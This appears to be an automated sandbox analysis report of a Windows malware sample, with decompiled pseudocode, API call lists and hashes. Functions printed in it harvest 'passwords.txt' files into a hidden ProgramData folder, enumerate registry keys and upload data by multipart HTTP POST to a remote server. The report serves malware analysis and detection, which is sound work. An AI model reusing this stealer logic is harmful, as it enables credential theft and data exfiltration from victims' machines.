                                                                                                                              0x0041aec6
                                                                                                                              0x0041aed4
                                                                                                                              0x0041aedc
                                                                                                                              0x0041aeea
                                                                                                                              0x0041aefe
                                                                                                                              0x0041aefe
                                                                                                                              0x0041af10
                                                                                                                              0x0041af10
                                                                                                                              0x0041ae8e
                                                                                                                              0x0041af1d
                                                                                                                              0x00000000
                                                                                                                              0x0041addd
                                                                                                                              0x0041addd
                                                                                                                              0x0041ade4
                                                                                                                              0x0041adf1
                                                                                                                              0x0041adf7
                                                                                                                              0x0041adf7
                                                                                                                              0x0041addb
                                                                                                                              0x00000000
                                                                                                                              0x0041ad90
                                                                                                                              0x0041af28
                                                                                                                              0x0041af2f
                                                                                                                              0x0041af35
                                                                                                                              0x0041ad1c
                                                                                                                              0x0041ad1c
                                                                                                                              0x0041ad1c
                                                                                                                              0x0041af3b
                                                                                                                              0x0041af48

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041ACB5
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 0041AD12
                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,?,?,00000400,00000000,00000000,00000000,00000000), ref: 0041AD7D
                                                                                                                              • wsprintfA.USER32 ref: 0041ADB0
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0041ADD3
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041ADE4
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041ADF1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpen$Enum_memsetwsprintf
                                                                                                                              • String ID: %s\%s$?
                                                                                                                              • API String ID: 1655683433-4134130046
                                                                                                                              • Opcode ID: c28af84634dd7fe829f9369c149b5434bdfd4557512f268f8a92ba82151ecc8b
                                                                                                                              • Instruction ID: 3ed3947afa43b3b00520fc6f230ae1a40cab295c59359ce42977ca459933d7fa
                                                                                                                              • Opcode Fuzzy Hash: c28af84634dd7fe829f9369c149b5434bdfd4557512f268f8a92ba82151ecc8b
                                                                                                                              • Instruction Fuzzy Hash: 0B614CB590122C9BDB25DF50DD94BE9B7BDFF48304F0081EAE249A6240DB745AC9CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00422460, Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 306networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 60%
                                                                                                                              			E00422460(void* __ebx, void** __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char* _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v52;
				char _v80;
				void* _v84;
				intOrPtr _v88;
				long _v92;
				void* _v96;
				void* _v100;
				char _v128;
				int _v132;
				char _v184;
				char _v188;
				char _v456;
				intOrPtr _v460;
				void* _v464;
				long _v468;
				char* _v472;
				void** _v476;
				signed int _t128;
				signed int _t129;
				void* _t147;
				long _t150;
				void* _t158;
				void* _t164;
				int _t182;
				void* _t199;
				void* _t271;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t275;
				void* _t281;

				_t272 = __esi;
				_t271 = __edi;
				_t199 = __ebx;
				_push(0xffffffff);
				_push(E004266A4);
				_push( *[fs:0x0]);
				_t275 = _t274 - 0x1cc;
				_t128 =  *0x4301f4; // 0xe687535
				_t129 = _t128 ^ _t273;
				_v24 = _t129;
				_push(_t129);
				 *[fs:0x0] =  &_v16;
				_v476 = __ecx;
				_t131 = _v476;
				_v476[0xd] = 0;
				if(_v476[0xb] != 0) {
					_v464 = _v476[0xb];
					_push(_v464);
					_t131 = E00405122();
					_t275 = _t275 + 4;
					_v476[0xb] = 0;
				}
				E00421740(_t131, _v476, "--");
				E00421740(E00421740( &(_v476[4]), _v476,  &(_v476[4])), _v476, "--\r\n");
				E004011C0( &_v52, _a4);
				_v8 = 0;
				_v88 = E00401EE0( &_v52, "http://", 0);
				_t281 = _v88 -  *0x42d8c4; // 0xffffffff
				if(_t281 != 0) {
					E00401B90( &_v52, _v88, 7);
				}
				_v88 = E00401370( &_v52, 0x2f, 0);
				E00401F30( &_v52,  &_v80, 0, _v88);
				_v8 = 1;
				E00401B90( &_v52, 0, _v88);
				E00401E10( &(_v476[0x11]), 0x104, _a4, 0x103);
				_v20 = 0;
				if(_v476[0xe] != 0) {
					_v20 = _v20 | 0x00000003;
				}
				_t257 = _v476;
				_t147 = InternetOpenA(_v476[3], _v20, _v476[0xe], 0, 0); // executed
				_v84 = _t147;
				if(_v84 != 0) {
					_v92 = 1;
					 *0x432838(_v84, 0x41,  &_v92, 4);
					_t257 = _v476;
					_t158 = InternetConnectA(_v84, E00401330( &_v80), 0x50, _v476[0xf], _v476[0x10], 3, 0, 1); // executed
					_v96 = _t158;
					if(_v96 != 0) {
						 *0x432838(_v96, 0x41, 1, 0);
						_t164 = HttpOpenRequestA(_v96, "POST", E00401330( &_v52), 0, 0, 0, 0x400000, 1); // executed
						_v100 = _t164;
						if(_v100 != 0) {
							E004217A0(_t199, _v476, _t271, _t272, _v100);
							E004011C0( &_v128, "Content-Type: multipart/form-data; boundary=");
							_v8 = 2;
							E00401EC0( &_v128,  &(_v476[4]));
							 *0x432834(_v100, E00401330( &_v128), E00401350( &_v128), 0x20000000);
							E00404F9A(_v476[2],  &_v184, 0x32, 0xa);
							E00401EA0( &_v128, "Content-Length: ");
							E00401EC0( &_v128,  &_v184);
							 *0x432834(_v100, E00401330( &_v128), E00401350( &_v128), 0x20000000);
							_t182 = HttpSendRequestA(_v100, 0, 0,  *_v476, _v476[2]); // executed
							_v132 = _t182;
							if(_v132 != 0) {
								_v188 = 0x104;
								_push(0);
								_push( &_v188);
								_push( &_v456);
								_push(0x2e);
								_push(_v100);
								if( *0x4327e4() != 0) {
									 *0x432800(_v100);
									 *((char*)(_t273 + _v188 - 0x1c4)) = 0;
									_v460 = E00401E50( &_v456, "http");
									E00401E10( &(_v476[0x11]), 0x104, _v460, 0x103);
									_v100 =  *0x43289c(_v84, _v460, 0, 0, 0x400000, 0);
								}
								if(_v100 != 0) {
									E00421CF0(_t199, _v476, _t271, _t272, _v100); // executed
								}
							}
							InternetCloseHandle(_v100); // executed
							_v8 = 1;
							E004012D0( &_v128);
						}
						_t257 = _v96;
						 *0x432800(_v96);
					}
					 *0x432800(_v84);
				}
				if(_v476[0xd] <= 0) {
					_v472 = 0;
					_v8 = 0;
					E004012D0( &_v80);
					_v8 = 0xffffffff;
					E004012D0( &_v52);
					_t150 = _v472;
				} else {
					_v468 = 1;
					_v8 = 0;
					E004012D0( &_v80);
					_v8 = 0xffffffff;
					E004012D0( &_v52);
					_t150 = _v468;
				}
				 *[fs:0x0] = _v16;
				return E00404354(_t150, _t199, _v24 ^ _t273, _t257, _t271, _t272);
			}






































                                                                                                                              0x00422460
                                                                                                                              0x00422460
                                                                                                                              0x00422460
                                                                                                                              0x00422463
                                                                                                                              0x00422465
                                                                                                                              0x00422470
                                                                                                                              0x00422471
                                                                                                                              0x00422477
                                                                                                                              0x0042247c
                                                                                                                              0x0042247e
                                                                                                                              0x00422481
                                                                                                                              0x00422485
                                                                                                                              0x0042248b
                                                                                                                              0x00422491
                                                                                                                              0x00422497
                                                                                                                              0x004224a8
                                                                                                                              0x004224b3
                                                                                                                              0x004224bf
                                                                                                                              0x004224c0
                                                                                                                              0x004224c5
                                                                                                                              0x004224ce
                                                                                                                              0x004224ce
                                                                                                                              0x004224e0
                                                                                                                              0x00422505
                                                                                                                              0x00422511
                                                                                                                              0x00422516
                                                                                                                              0x0042252c
                                                                                                                              0x00422532
                                                                                                                              0x00422538
                                                                                                                              0x00422543
                                                                                                                              0x00422543
                                                                                                                              0x00422554
                                                                                                                              0x00422564
                                                                                                                              0x00422569
                                                                                                                              0x00422576
                                                                                                                              0x00422593
                                                                                                                              0x0042259b
                                                                                                                              0x004225ac
                                                                                                                              0x004225b4
                                                                                                                              0x004225b4
                                                                                                                              0x004225c9
                                                                                                                              0x004225d3
                                                                                                                              0x004225d9
                                                                                                                              0x004225e0
                                                                                                                              0x004225e6
                                                                                                                              0x004225f9
                                                                                                                              0x0042260f
                                                                                                                              0x00422628
                                                                                                                              0x0042262e
                                                                                                                              0x00422635
                                                                                                                              0x00422645
                                                                                                                              0x0042266a
                                                                                                                              0x00422670
                                                                                                                              0x00422677
                                                                                                                              0x00422687
                                                                                                                              0x00422694
                                                                                                                              0x00422699
                                                                                                                              0x004226aa
                                                                                                                              0x004226ca
                                                                                                                              0x004226e5
                                                                                                                              0x004226f5
                                                                                                                              0x00422704
                                                                                                                              0x00422724
                                                                                                                              0x00422745
                                                                                                                              0x0042274b
                                                                                                                              0x00422752
                                                                                                                              0x00422758
                                                                                                                              0x00422762
                                                                                                                              0x0042276a
                                                                                                                              0x00422771
                                                                                                                              0x00422772
                                                                                                                              0x00422777
                                                                                                                              0x00422780
                                                                                                                              0x00422786
                                                                                                                              0x00422792
                                                                                                                              0x004227ae
                                                                                                                              0x004227cf
                                                                                                                              0x004227f3
                                                                                                                              0x004227f3
                                                                                                                              0x004227fa
                                                                                                                              0x00422806
                                                                                                                              0x00422806
                                                                                                                              0x004227fa
                                                                                                                              0x0042280f
                                                                                                                              0x00422815
                                                                                                                              0x0042281c
                                                                                                                              0x0042281c
                                                                                                                              0x00422821
                                                                                                                              0x00422825
                                                                                                                              0x00422825
                                                                                                                              0x0042282f
                                                                                                                              0x0042282f
                                                                                                                              0x0042283f
                                                                                                                              0x00422870
                                                                                                                              0x0042287a
                                                                                                                              0x00422881
                                                                                                                              0x00422886
                                                                                                                              0x00422890
                                                                                                                              0x00422895
                                                                                                                              0x00422841
                                                                                                                              0x00422841
                                                                                                                              0x0042284b
                                                                                                                              0x00422852
                                                                                                                              0x00422857
                                                                                                                              0x00422861
                                                                                                                              0x00422866
                                                                                                                              0x00422866
                                                                                                                              0x004228bb
                                                                                                                              0x004228d0

                                                                                                                              APIs
                                                                                                                              • __mbstowcs_l.LIBCMTD ref: 00422593
                                                                                                                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000,--,?,0042A000,0E687535), ref: 004225D3
                                                                                                                              • InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 00422628
                                                                                                                              • HttpOpenRequestA.WININET(00000000,POST,00000000,00000000,00000000,00000000,00400000,00000001), ref: 0042266A
                                                                                                                              • __itow_s.LIBCMT ref: 004226E5
                                                                                                                                • Part of subcall function 00404F9A: _xtoa_s@20.LIBCMT ref: 00404FBD
                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00422745
                                                                                                                              • __mbstowcs_l.LIBCMTD ref: 004227CF
                                                                                                                                • Part of subcall function 00401E10: __cftof.LIBCMT ref: 00401E23
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0042280F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$HttpOpenRequest__mbstowcs_l$CloseConnectHandleSend__cftof__itow_s_xtoa_s@20
                                                                                                                              • String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
                                                                                                                              • API String ID: 1354010774-1095625359
                                                                                                                              • Opcode ID: 6ef930aceb50f50c88dad62f9af03b6e3da15786f337afd65bc5808adaf03fda
                                                                                                                              • Instruction ID: faf664677b1087e991e18eee5182954285e9de6bbfcc660a5bad21f60391df42
                                                                                                                              • Opcode Fuzzy Hash: 6ef930aceb50f50c88dad62f9af03b6e3da15786f337afd65bc5808adaf03fda
                                                                                                                              • Instruction Fuzzy Hash: D4D13C70A00218ABDB14EB94DC95FEEB375BB44704F5041AAF505BB2D1DBB8AE84CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00424D00, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 79stringfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 42%
                                                                                                                              			E00424D00(void* __ebx, CHAR* __edx, void* __edi, void* __esi, void* __eflags, CHAR* _a8, intOrPtr _a12, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v540;
				signed int _t21;
				intOrPtr _t25;
				void* _t41;
				intOrPtr _t54;
				signed int _t58;
				void* _t59;
				void* _t60;

				_t57 = __esi;
				_t56 = __edi;
				_t51 = __edx;
				_t42 = __ebx;
				_t21 =  *0x4301f4; // 0xe687535
				_v12 = _t21 ^ _t58;
				SetCurrentDirectoryA(_a8); // executed
				_t25 = E004043DF(__ebx, _t51, __edi, __esi, _a12, 0x431e70); // executed
				_t60 = _t59 + 8;
				_v8 = _t25;
				if(_v8 != 0xffffffff) {
					do {
						E004091C0( &_v540, 0, 0x104);
						E004091C0( &_v276, 0, 0x104);
						 *0x4328c4( &_v540, _a8);
						 *0x4328c4( &_v540, "passwords.txt");
						 *0x4328c4( &_v276, "C:\\ProgramData\\300337377349991");
						_t54 =  *0x4320c4; // 0x2337e30
						 *0x4328c4( &_v276, _t54);
						 *0x4328c4( &_v276, _a20);
						 *0x4328c4( &_v276, "passwords.txt");
						_t51 =  &_v540;
						CopyFileA( &_v540,  &_v276, 1); // executed
						_t41 = E00404506(__ebx,  &_v540, __edi, __esi, _v8, 0x431e70); // executed
						_t60 = _t60 + 0x20;
					} while (_t41 == 0);
					_t25 = E00404634(_v8);
				}
				return E00404354(_t25, _t42, _v12 ^ _t58, _t51, _t56, _t57);
			}














                                                                                                                              0x00424d00
                                                                                                                              0x00424d00
                                                                                                                              0x00424d00
                                                                                                                              0x00424d00
                                                                                                                              0x00424d09
                                                                                                                              0x00424d10
                                                                                                                              0x00424d17
                                                                                                                              0x00424d26
                                                                                                                              0x00424d2b
                                                                                                                              0x00424d2e
                                                                                                                              0x00424d35
                                                                                                                              0x00424d3b
                                                                                                                              0x00424d49
                                                                                                                              0x00424d5f
                                                                                                                              0x00424d72
                                                                                                                              0x00424d84
                                                                                                                              0x00424d96
                                                                                                                              0x00424d9c
                                                                                                                              0x00424daa
                                                                                                                              0x00424dbb
                                                                                                                              0x00424dcd
                                                                                                                              0x00424ddc
                                                                                                                              0x00424de3
                                                                                                                              0x00424df2
                                                                                                                              0x00424df7
                                                                                                                              0x00424dfa
                                                                                                                              0x00424e06
                                                                                                                              0x00424e0b
                                                                                                                              0x00424e1b

                                                                                                                              APIs
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00424F3F), ref: 00424D17
                                                                                                                              • __findfirst64i32.LIBCMT ref: 00424D26
                                                                                                                              • _memset.LIBCMT ref: 00424D49
                                                                                                                              • _memset.LIBCMT ref: 00424D5F
                                                                                                                              • lstrcat.KERNEL32(?,00424F3F), ref: 00424D72
                                                                                                                              • lstrcat.KERNEL32(?,passwords.txt), ref: 00424D84
                                                                                                                              • lstrcat.KERNEL32(?,C:\\ProgramData\\300337377349991), ref: 00424D96
                                                                                                                              • lstrcat.KERNEL32(?,02337E30), ref: 00424DAA
                                                                                                                              • lstrcat.KERNEL32(?,00424EE3), ref: 00424DBB
                                                                                                                              • lstrcat.KERNEL32(?,passwords.txt), ref: 00424DCD
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00424DE3
                                                                                                                              • __findnext64i32.LIBCMT ref: 00424DF2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$_memset$CopyCurrentDirectoryFile__findfirst64i32__findnext64i32
                                                                                                                              • String ID: C:\\ProgramData\\300337377349991$passwords.txt
                                                                                                                              • API String ID: 844519491-1986838062
                                                                                                                              • Opcode ID: e7f05cfdac8478aabc2ed35e95e0e28842fb9a9b9d53bf89e4aab547a3be5951
                                                                                                                              • Instruction ID: 0a98c26ee22be9fba806c266b3a98fbd47b499360a5eee5ad6601350f0339ea8
                                                                                                                              • Opcode Fuzzy Hash: e7f05cfdac8478aabc2ed35e95e0e28842fb9a9b9d53bf89e4aab547a3be5951
                                                                                                                              • Instruction Fuzzy Hash: A6218CB290021CABCB18EBA0DD8AEDD7378AB5C301F0456A9F716571D0DBB49A88CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419700, Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 730libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID: HeapFree$RegEnumValueA
                                                                                                                              • API String ID: 1029625771-3819337796
                                                                                                                              • Opcode ID: 90ef07fcd7b925f46b8ad25f3b92ab2857b100e4aaa4e3dee816f5f4efc41360
                                                                                                                              • Instruction ID: 49dd401f3f8a9704e5ea376b98ecc7ad5ccb799543314d91de91546e4023b833
                                                                                                                              • Opcode Fuzzy Hash: 90ef07fcd7b925f46b8ad25f3b92ab2857b100e4aaa4e3dee816f5f4efc41360
                                                                                                                              • Instruction Fuzzy Hash: 6D624BB5900204EFC748EFA8EE9899ABBF9FB4C301B14E629E505D3360D7B49541CF68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041DCA0, Relevance: 19.8, APIs: 13, Instructions: 286stringfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041DCBF
                                                                                                                              • lstrcat.KERNEL32(?,02336800), ref: 0041DCD3
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041DCE6
                                                                                                                              • _memset.LIBCMT ref: 0041DCFA
                                                                                                                              • wsprintfA.USER32 ref: 0041DD18
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0041E0C6
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                              • lstrcat.KERNEL32(?,02336750), ref: 0041DECF
                                                                                                                              • lstrcat.KERNEL32(?,02336820), ref: 0041DEEF
                                                                                                                              • lstrcat.KERNEL32(?,02336750), ref: 0041DFA1
                                                                                                                              • lstrcat.KERNEL32(?,02336820), ref: 0041DFC0
                                                                                                                              • lstrcat.KERNEL32(?,00429CCC), ref: 0041DFEA
                                                                                                                              • _fprintf.LIBCMT ref: 0041E06D
                                                                                                                              • _fprintf.LIBCMT ref: 0041E089
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3836584492-0
                                                                                                                              • Opcode ID: d8b20109aa66b115ba5ea3117337ceb65497a12725fdff501180ec977d61706c
                                                                                                                              • Instruction ID: c88c65ffe1260dd4c76004f7af897511baf4b03775390616ead9ee4b2e68dc4a
                                                                                                                              • Opcode Fuzzy Hash: d8b20109aa66b115ba5ea3117337ceb65497a12725fdff501180ec977d61706c
                                                                                                                              • Instruction Fuzzy Hash: BDC10CB1E042189FCB64DF68DD88BDEB7B5EB48301F0482E9E509A7290D7759E84CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00414DA0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 204fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 97%
                                                                                                                              			E00414DA0(void* __ebx, signed int __edx, void* __edi, void* __esi, void* _a4, signed int* _a8, signed int _a12, intOrPtr* _a16, signed int* _a20) {
				int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				signed int _v24;
				intOrPtr _v52;
				intOrPtr _v60;
				signed int _v68;
				struct _BY_HANDLE_FILE_INFORMATION _v76;
				long _v80;
				void _v84;
				void _v88;
				void _v92;
				signed short _v96;
				signed short _v100;
				signed int _t89;
				int _t92;
				void* _t102;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t112;
				void* _t130;
				intOrPtr* _t145;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr _t167;
				intOrPtr _t168;
				void* _t177;
				void* _t178;
				signed int _t179;
				void* _t180;

				_t178 = __esi;
				_t177 = __edi;
				_t158 = __edx;
				_t130 = __ebx;
				_t89 =  *0x4301f4; // 0xe687535
				_v24 = _t89 ^ _t179;
				_t92 = GetFileInformationByHandle(_a4,  &_v76); // executed
				_v8 = _t92;
				if(_v8 != 0) {
					_v16 = _v76.dwFileAttributes;
					_v12 = 0;
					if((_v16 & 0x00000001) != 0) {
						_v12 = _v12 | 0x00000001;
					}
					if((_v16 & 0x00000002) != 0) {
						_v12 = _v12 | 0x00000002;
					}
					if((_v16 & 0x00000004) != 0) {
						_v12 = _v12 | 0x00000004;
					}
					if((_v16 & 0x00000010) != 0) {
						_v12 = _v12 | 0x00000010;
					}
					if((_v16 & 0x00000020) != 0) {
						_v12 = _v12 | 0x00000020;
					}
					if((_v16 & 0x00000010) == 0) {
						_v12 = _v12 | 0x80000000;
					} else {
						_v12 = _v12 | 0x40000000;
					}
					_v12 = _v12 | 0x01000000;
					_t158 = _v16 & 0x00000001;
					if((_v16 & 0x00000001) == 0) {
						_v12 = _v12 | 0x00800000;
					}
					_v80 = GetFileSize(_a4, 0);
					if(_v80 > 0x28) {
						SetFilePointer(_a4, 0, 0, 0); // executed
						ReadFile(_a4,  &_v84, 2,  &_v20, 0); // executed
						SetFilePointer(_a4, 0x24, 0, 0); // executed
						_t158 =  &_v88;
						ReadFile(_a4,  &_v88, 4,  &_v20, 0); // executed
						if((_v84 & 0x0000ffff) == 0x54ad) {
							_t158 = _v88 + 0x34;
							if(_v80 > _v88 + 0x34) {
								SetFilePointer(_a4, _v88, 0, 0);
								_t158 =  &_v20;
								ReadFile(_a4,  &_v92, 4,  &_v20, 0);
								if(_v92 == 0x5a4d || _v92 == 0x454e || _v92 == 0x454c || _v92 == 0x4550) {
									_t158 = _v12 | 0x00400000;
									_v12 = _v12 | 0x00400000;
								}
							}
						}
					}
					if(_a8 != 0) {
						 *_a8 = _v12;
					}
					if(_a12 != 0) {
						_t158 = _a12;
						 *_a12 = _v80;
					}
					if(_a16 != 0) {
						_t167 = _v76.ftLastAccessTime;
						_t108 = E00412F70(_t167, _v60);
						_t145 = _a16;
						 *_t145 = _t108;
						 *((intOrPtr*)(_t145 + 4)) = _t167;
						_t168 = _v52;
						_t110 = E00412F70(_v76.ftLastWriteTime, _t168);
						_t146 = _a16;
						 *((intOrPtr*)(_t146 + 8)) = _t110;
						 *((intOrPtr*)(_t146 + 0xc)) = _t168;
						_t158 = _v68;
						_t112 = E00412F70(_v76.ftCreationTime, _t158);
						_t180 = _t180 + 0x18;
						_t147 = _a16;
						 *((intOrPtr*)(_t147 + 0x10)) = _t112;
						 *(_t147 + 0x14) = _t158;
					}
					if(_a20 != 0) {
						E00412EB0(_v76.ftLastWriteTime, _v52,  &_v100,  &_v96);
						_t158 = _a20;
						 *_a20 = _v96 & 0x0000ffff | (_v100 & 0x0000ffff) << 0x00000010;
					}
					_t102 = 0;
					goto L35;
				} else {
					_t102 = 0x200;
					L35:
					return E00404354(_t102, _t130, _v24 ^ _t179, _t158, _t177, _t178);
				}
			}


































                                                                                                                              0x00414da0
                                                                                                                              0x00414da0
                                                                                                                              0x00414da0
                                                                                                                              0x00414da0
                                                                                                                              0x00414da6
                                                                                                                              0x00414dad
                                                                                                                              0x00414db8
                                                                                                                              0x00414dbe
                                                                                                                              0x00414dc5
                                                                                                                              0x00414dd4
                                                                                                                              0x00414dd7
                                                                                                                              0x00414de4
                                                                                                                              0x00414dec
                                                                                                                              0x00414dec
                                                                                                                              0x00414df5
                                                                                                                              0x00414dfd
                                                                                                                              0x00414dfd
                                                                                                                              0x00414e06
                                                                                                                              0x00414e0e
                                                                                                                              0x00414e0e
                                                                                                                              0x00414e17
                                                                                                                              0x00414e1f
                                                                                                                              0x00414e1f
                                                                                                                              0x00414e28
                                                                                                                              0x00414e30
                                                                                                                              0x00414e30
                                                                                                                              0x00414e39
                                                                                                                              0x00414e51
                                                                                                                              0x00414e3b
                                                                                                                              0x00414e44
                                                                                                                              0x00414e44
                                                                                                                              0x00414e5d
                                                                                                                              0x00414e63
                                                                                                                              0x00414e66
                                                                                                                              0x00414e72
                                                                                                                              0x00414e72
                                                                                                                              0x00414e81
                                                                                                                              0x00414e88
                                                                                                                              0x00414e98
                                                                                                                              0x00414eae
                                                                                                                              0x00414ebe
                                                                                                                              0x00414ecc
                                                                                                                              0x00414ed4
                                                                                                                              0x00414ee4
                                                                                                                              0x00414ee9
                                                                                                                              0x00414eef
                                                                                                                              0x00414efd
                                                                                                                              0x00414f05
                                                                                                                              0x00414f13
                                                                                                                              0x00414f20
                                                                                                                              0x00414f40
                                                                                                                              0x00414f46
                                                                                                                              0x00414f46
                                                                                                                              0x00414f20
                                                                                                                              0x00414eef
                                                                                                                              0x00414ee4
                                                                                                                              0x00414f4d
                                                                                                                              0x00414f55
                                                                                                                              0x00414f55
                                                                                                                              0x00414f5b
                                                                                                                              0x00414f5d
                                                                                                                              0x00414f63
                                                                                                                              0x00414f63
                                                                                                                              0x00414f69
                                                                                                                              0x00414f6f
                                                                                                                              0x00414f73
                                                                                                                              0x00414f7b
                                                                                                                              0x00414f7e
                                                                                                                              0x00414f80
                                                                                                                              0x00414f83
                                                                                                                              0x00414f8b
                                                                                                                              0x00414f93
                                                                                                                              0x00414f96
                                                                                                                              0x00414f99
                                                                                                                              0x00414f9c
                                                                                                                              0x00414fa4
                                                                                                                              0x00414fa9
                                                                                                                              0x00414fac
                                                                                                                              0x00414faf
                                                                                                                              0x00414fb2
                                                                                                                              0x00414fb2
                                                                                                                              0x00414fb9
                                                                                                                              0x00414fcb
                                                                                                                              0x00414fe0
                                                                                                                              0x00414fe3
                                                                                                                              0x00414fe3
                                                                                                                              0x00414fe5
                                                                                                                              0x00000000
                                                                                                                              0x00414dc7
                                                                                                                              0x00414dc7
                                                                                                                              0x00414fe7
                                                                                                                              0x00414ff4
                                                                                                                              0x00414ff4

                                                                                                                              APIs
                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 00414DB8
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00414E7B
                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00414E98
                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 00414EAE
                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 00414EBE
                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00414ED4
                                                                                                                              • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 00414EFD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Pointer$Read$HandleInformationSize
                                                                                                                              • String ID: ($PE
                                                                                                                              • API String ID: 4143101051-3347799738
                                                                                                                              • Opcode ID: 73688f45af0be80ef4f12a2f87dfdc21f3fcb5f8b722a710a9cf8febf1ec73ac
                                                                                                                              • Instruction ID: c5050f7acb5cbcbc28ed86ef46dc34b2836c810015344e94891c9d8cc76daef6
                                                                                                                              • Opcode Fuzzy Hash: 73688f45af0be80ef4f12a2f87dfdc21f3fcb5f8b722a710a9cf8febf1ec73ac
                                                                                                                              • Instruction Fuzzy Hash: 26813B71E10208EFDB14CFD4D895BEEBBB5FB88304F14845AE505AB384D7749A85CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B340, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 71libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 94%
                                                                                                                              			E0041B340(void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				signed int _v12;
				char _v276;
				unsigned int _v280;
				intOrPtr _v336;
				intOrPtr _v340;
				char _v348;
				struct _MEMORYSTATUS _v380;
				signed int _t29;
				CHAR* _t31;
				struct _MEMORYSTATUSEX* _t40;
				void* _t42;
				CHAR* _t43;
